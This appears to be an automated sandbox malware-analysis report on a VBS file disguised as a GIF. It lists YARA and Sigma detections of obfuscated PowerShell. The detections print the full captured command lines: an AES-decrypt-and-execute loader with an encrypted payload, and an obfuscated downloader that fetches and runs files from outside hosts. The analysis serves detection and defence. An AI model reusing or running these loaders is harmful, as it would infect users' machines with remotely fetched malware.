            amsi64_4432.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
              amsi64_4432.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security
                amsi32_7244.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                  amsi32_7244.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
                  • 0xf515:$b2: ::FromBase64String(
                  • 0xc8e3:$s1: -join
                  • 0x608f:$s4: +=
                  • 0x6151:$s4: +=
                  • 0xa378:$s4: +=
                  • 0xc495:$s4: +=
                  • 0xc77f:$s4: +=
                  • 0xc8c5:$s4: +=
                  • 0xec5a:$s4: +=
                  • 0xecda:$s4: +=
                  • 0xeda0:$s4: +=
                  • 0xee20:$s4: +=
                  • 0xeff6:$s4: +=
                  • 0xf07a:$s4: +=
                  • 0xd0e5:$e4: Get-WmiObject
                  • 0xd2d4:$e4: Get-Process
                  • 0xd32c:$e4: Start-Process
                  amsi32_7632.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
                  • 0xa0d5:$b2: ::FromBase64String(
                  • 0x917b:$s1: -join
                  • 0x2927:$s4: +=
                  • 0x29e9:$s4: +=
                  • 0x6c10:$s4: +=
                  • 0x8d2d:$s4: +=
                  • 0x9017:$s4: +=
                  • 0x915d:$s4: +=
                  • 0x1246a:$s4: +=
                  • 0x124ea:$s4: +=
                  • 0x125b0:$s4: +=
                  • 0x12630:$s4: +=
                  • 0x12806:$s4: +=
                  • 0x1288a:$s4: +=
                  • 0x997d:$e4: Get-WmiObject
                  • 0x9b6c:$e4: Get-Process
                  • 0x9bc4:$e4: Start-Process
                  • 0x13113:$e4: Get-Process

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: Base64 Encoded PowerShell Command Detected
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI98685860701936162316809131591218CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnI/cGJmqVj5jCchNUuqniccRhpmR5qMkJqyaxLjAOoZS+I6UjjzBuHKkMUIawH3bTvDj7nWJq1X++W/D0YbGXb8mznv8QaOqQP1S2jB+yDre2mYNc51z88VDp5yhLxv2jub4BAD5MQkn09gj7sFrzKiS0Lv4bbd7SWdBlNNY01HOPdZZi88uLKrHF094fRfKbDTWl6drqxh86PYBPPz5p2Ly9NFsVGPk0kub6u6Kg9MbD3UxusVGZCdUc0aq5EXDqvPaek1WSrhMDfsWP03fZTtbxI2uIb73uc20hNa8tKlWpVgQcg5yXgT1Syt4JsFjugZ9Qtq1uX/OG7aRAuR2SPi44P27EfktJtInMKpDXYHkjZS52YqNTFAu7vkn80WLfrjaKO1puSNI83KG4Gb5VMO0L0qfDKNvusZUr6nwSAndn5NEdU4kRRcVNX137D+ZBob0WbqlGLDBY6a+EMGzYtzcJ9yDU9sRHuvpnJ5c0hkwPy4DW2nC9xKyXClHpMrOAGz59KK909AdcVa3cZMI4okN0iylLC6wphikPk+n/lH8dSrmPfxXmnyxHQ6FPMQ3t7W6XvHMIHBTNK1roZfwexEEon7dKRDC0d2IrLWlyM+aSkJSwieqOUXpMZyJUm2hcsj8O2qQ6SJSSECSO9pH7mC3RTLzx/Yu4I0g+aMXaEbo7jnGZCzrsoXBRasrE5huijlM3SPVHWt7BmPHFNB5UAtl1Poeor3payTIoDvmHLQ5udJKwLQ55FOeaNJf+pmojioT+Punj9PkhiGcH6xTdE+2IrxNPE7ay7Vlrz0F+zzhORfur8P5pHWq383QgBA8DubDwQoW+2/zvvGy0+vtBVpAZBtMhKqsSHtY4fy3hgqLxKhWAneQJQ8WqLkzqUVDY9EPZtjGeMds6via1iXp+weIOrC5nUhoaj4yGoY2MoXMyeOduTv3614RUxvqvvcerqLinXXajm5YyY2gVFXVy7lQs/l3ppDJ/Er9yz3s9rYpNCLl0sEExFChP/0AEE9hA3qtQqm07KfQM7Fm/TxVhAZZQIl8WYJ4sl9VdVuOvk82qKlTC24fpX5MYkZQF4iy2oZu7+PswZNBWNr+R8IbeXGpk6YULjJIQEn49p7IIebLL4A+J83MoPUBcLr/3wfiOdRztCS5fsI1/7gWW61aBZmh9WQ5Y/PN8qrPMJKYzSp84UIHHxGLfpUuclLTYd6067KhaUF+isNYUo0YQamdLvdcnsAnB1fFVG2Z6opzbG7sqFu6AQguz584NTtWuBMlcl43XDc/g09jFmr9jk22MvT+6/1kqeSuax5g4j6g6n3MjeEp9CvY3LOjh+/KWuQr/Kbqc4JIBZhwkTcrNn4Yi2/MmJ/0v3oIfVqNNecpNoQxXyyJjgkG+362VFqQj/+ROnzXepvq3WcWkQ/CheHAW5Iw==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion'
                  Sigma detected: Cscript/Wscript Uncommon Script Extension Execution
                  Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\createdthingstobefrankwithmeeverywhere.gIF.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\createdthingstobefrankwithmeeverywhere.gIF.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\createdthingstobefrankwithmeeverywhere.gIF.vbs", ProcessId: 3500, ProcessName: wscript.exe
                  Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
                  Source: Process startedAuthor: Thomas Patzke: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI98685860701936162316809131591218CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnI/cGJmqVj5jCchNUuqniccRhpmR5qMkJqyaxLjAOoZS+I6UjjzBuHKkMUIawH3bTvDj7nWJq1X++W/D0YbGXb8mznv8QaOqQP1S2jB+yDre2mYNc51z88VDp5yhLxv2jub4BAD5MQkn09gj7sFrzKiS0Lv4bbd7SWdBlNNY01HOPdZZi88uLKrHF094fRfKbDTWl6drqxh86PYBPPz5p2Ly9NFsVGPk0kub6u6Kg9MbD3UxusVGZCdUc0aq5EXDqvPaek1WSrhMDfsWP03fZTtbxI2uIb73uc20hNa8tKlWpVgQcg5yXgT1Syt4JsFjugZ9Qtq1uX/OG7aRAuR2SPi44P27EfktJtInMKpDXYHkjZS52YqNTFAu7vkn80WLfrjaKO1puSNI83KG4Gb5VMO0L0qfDKNvusZUr6nwSAndn5NEdU4kRRcVNX137D+ZBob0WbqlGLDBY6a+EMGzYtzcJ9yDU9sRHuvpnJ5c0hkwPy4DW2nC9xKyXClHpMrOAGz59KK909AdcVa3cZMI4okN0iylLC6wphikPk+n/lH8dSrmPfxXmnyxHQ6FPMQ3t7W6XvHMIHBTNK1roZfwexEEon7dKRDC0d2IrLWlyM+aSkJSwieqOUXpMZyJUm2hcsj8O2qQ6SJSSECSO9pH7mC3RTLzx/Yu4I0g+aMXaEbo7jnGZCzrsoXBRasrE5huijlM3SPVHWt7BmPHFNB5UAtl1Poeor3payTIoDvmHLQ5udJKwLQ55FOeaNJf+pmojioT+Punj9PkhiGcH6xTdE+2IrxNPE7ay7Vlrz0F+zzhORfur8P5pHWq383QgBA8DubDwQoW+2/zvvGy0+vtBVpAZBtMhKqsSHtY4fy3hgqLxKhWAneQJQ8WqLkzqUVDY9EPZtjGeMds6via1iXp+weIOrC5nUhoaj4yGoY2MoXMyeOduTv3614RUxvqvvcerqLinXXajm5YyY2gVFXVy7lQs/l3ppDJ/Er9yz3s9rYpNCLl0sEExFChP/0AEE9hA3qtQqm07KfQM7Fm/TxVhAZZQIl8WYJ4sl9VdVuOvk82qKlTC24fpX5MYkZQF4iy2oZu7+PswZNBWNr+R8IbeXGpk6YULjJIQEn49p7IIebLL4A+J83MoPUBcLr/3wfiOdRztCS5fsI1/7gWW61aBZmh9WQ5Y/PN8qrPMJKYzSp84UIHHxGLfpUuclLTYd6067KhaUF+isNYUo0YQamdLvdcnsAnB1fFVG2Z6opzbG7sqFu6AQguz584NTtWuBMlcl43XDc/g09jFmr9jk22MvT+6/1kqeSuax5g4j6g6n3MjeEp9CvY3LOjh+/KWuQr/Kbqc4JIBZhwkTcrNn4Yi2/MmJ/0v3oIfVqNNecpNoQxXyyJjgkG+362VFqQj/+ROnzXepvq3WcWkQ/CheHAW5Iw==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion'
                  Sigma detected: Invoke-Obfuscation CLIP+ Launcher
                  Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes94 'S$ gSlPoAbLaSlb:AS.a tTeSlNl,iSt =T(,T ecs tF- PSa,t.h, N$FPS
                  Sigma detected: Invoke-Obfuscation VAR+ Launcher
                  Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes94 'S$ gSlPoAbLaSlb:AS.a tTeSlNl,iSt =T(,T ecs tF- PSa,t.h, N$FPS
                  Sigma detected: Potential PowerShell Command Line Obfuscation
                  Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI98685860701936162316809131591218CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnI/cGJmqVj5jCchNUuqniccRhpmR5qMkJqyaxLjAOoZS+I6UjjzBuHKkMUIawH3bTvDj7nWJq1X++W/D0YbGXb8mznv8QaOqQP1S2jB+yDre2mYNc51z88VDp5yhLxv2jub4BAD5MQkn09gj7sFrzKiS0Lv4bbd7SWdBlNNY01HOPdZZi88uLKrHF094fRfKbDTWl6drqxh86PYBPPz5p2Ly9NFsVGPk0kub6u6Kg9MbD3UxusVGZCdUc0aq5EXDqvPaek1WSrhMDfsWP03fZTtbxI2uIb73uc20hNa8tKlWpVgQcg5yXgT1Syt4JsFjugZ9Qtq1uX/OG7aRAuR2SPi44P27EfktJtInMKpDXYHkjZS52YqNTFAu7vkn80WLfrjaKO1puSNI83KG4Gb5VMO0L0qfDKNvusZUr6nwSAndn5NEdU4kRRcVNX137D+ZBob0WbqlGLDBY6a+EMGzYtzcJ9yDU9sRHuvpnJ5c0hkwPy4DW2nC9xKyXClHpMrOAGz59KK909AdcVa3cZMI4okN0iylLC6wphikPk+n/lH8dSrmPfxXmnyxHQ6FPMQ3t7W6XvHMIHBTNK1roZfwexEEon7dKRDC0d2IrLWlyM+aSkJSwieqOUXpMZyJUm2hcsj8O2qQ6SJSSECSO9pH7mC3RTLzx/Yu4I0g+aMXaEbo7jnGZCzrsoXBRasrE5huijlM3SPVHWt7BmPHFNB5UAtl1Poeor3payTIoDvmHLQ5udJKwLQ55FOeaNJf+pmojioT+Punj9PkhiGcH6xTdE+2IrxNPE7ay7Vlrz0F+zzhORfur8P5pHWq383QgBA8DubDwQoW+2/zvvGy0+vtBVpAZBtMhKqsSHtY4fy3hgqLxKhWAneQJQ8WqLkzqUVDY9EPZtjGeMds6via1iXp+weIOrC5nUhoaj4yGoY2MoXMyeOduTv3614RUxvqvvcerqLinXXajm5YyY2gVFXVy7lQs/l3ppDJ/Er9yz3s9rYpNCLl0sEExFChP/0AEE9hA3qtQqm07KfQM7Fm/TxVhAZZQIl8WYJ4sl9VdVuOvk82qKlTC24fpX5MYkZQF4iy2oZu7+PswZNBWNr+R8IbeXGpk6YULjJIQEn49p7IIebLL4A+J83MoPUBcLr/3wfiOdRztCS5fsI1/7gWW61aBZmh9WQ5Y/PN8qrPMJKYzSp84UIHHxGLfpUuclLTYd6067KhaUF+isNYUo0YQamdLvdcnsAnB1fFVG2Z6opzbG7sqFu6AQguz584NTtWuBMlcl43XDc/g09jFmr9jk22MvT+6/1kqeSuax5g4j6g6n3MjeEp9CvY3LOjh+/KWuQr/Kbqc4JIBZhwkTcrNn4Yi2/MmJ/0v3oIfVqNNecpNoQxXyyJjgkG+362VFqQj/+ROnzXepvq3WcWkQ/CheHAW5Iw==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion'
                  Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI98685860701936162316809131591218CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnI/cGJmqVj5jCchNUuqniccRhpmR5qMkJqyaxLjAOoZS+I6UjjzBuHKkMUIawH3bTvDj7nWJq1X++W/D0YbGXb8mznv8QaOqQP1S2jB+yDre2mYNc51z88VDp5yhLxv2jub4BAD5MQkn09gj7sFrzKiS0Lv4bbd7SWdBlNNY01HOPdZZi88uLKrHF094fRfKbDTWl6drqxh86PYBPPz5p2Ly9NFsVGPk0kub6u6Kg9MbD3UxusVGZCdUc0aq5EXDqvPaek1WSrhMDfsWP03fZTtbxI2uIb73uc20hNa8tKlWpVgQcg5yXgT1Syt4JsFjugZ9Qtq1uX/OG7aRAuR2SPi44P27EfktJtInMKpDXYHkjZS52YqNTFAu7vkn80WLfrjaKO1puSNI83KG4Gb5VMO0L0qfDKNvusZUr6nwSAndn5NEdU4kRRcVNX137D+ZBob0WbqlGLDBY6a+EMGzYtzcJ9yDU9sRHuvpnJ5c0hkwPy4DW2nC9xKyXClHpMrOAGz59KK909AdcVa3cZMI4okN0iylLC6wphikPk+n/lH8dSrmPfxXmnyxHQ6FPMQ3t7W6XvHMIHBTNK1roZfwexEEon7dKRDC0d2IrLWlyM+aSkJSwieqOUXpMZyJUm2hcsj8O2qQ6SJSSECSO9pH7mC3RTLzx/Yu4I0g+aMXaEbo7jnGZCzrsoXBRasrE5huijlM3SPVHWt7BmPHFNB5UAtl1Poeor3payTIoDvmHLQ5udJKwLQ55FOeaNJf+pmojioT+Punj9PkhiGcH6xTdE+2IrxNPE7ay7Vlrz0F+zzhORfur8P5pHWq383QgBA8DubDwQoW+2/zvvGy0+vtBVpAZBtMhKqsSHtY4fy3hgqLxKhWAneQJQ8WqLkzqUVDY9EPZtjGeMds6via1iXp+weIOrC5nUhoaj4yGoY2MoXMyeOduTv3614RUxvqvvcerqLinXXajm5YyY2gVFXVy7lQs/l3ppDJ/Er9yz3s9rYpNCLl0sEExFChP/0AEE9hA3qtQqm07KfQM7Fm/TxVhAZZQIl8WYJ4sl9VdVuOvk82qKlTC24fpX5MYkZQF4iy2oZu7+PswZNBWNr+R8IbeXGpk6YULjJIQEn49p7IIebLL4A+J83MoPUBcLr/3wfiOdRztCS5fsI1/7gWW61aBZmh9WQ5Y/PN8qrPMJKYzSp84UIHHxGLfpUuclLTYd6067KhaUF+isNYUo0YQamdLvdcnsAnB1fFVG2Z6opzbG7sqFu6AQguz584NTtWuBMlcl43XDc/g09jFmr9jk22MvT+6/1kqeSuax5g4j6g6n3MjeEp9CvY3LOjh+/KWuQr/Kbqc4JIBZhwkTcrNn4Yi2/MmJ/0v3oIfVqNNecpNoQxXyyJjg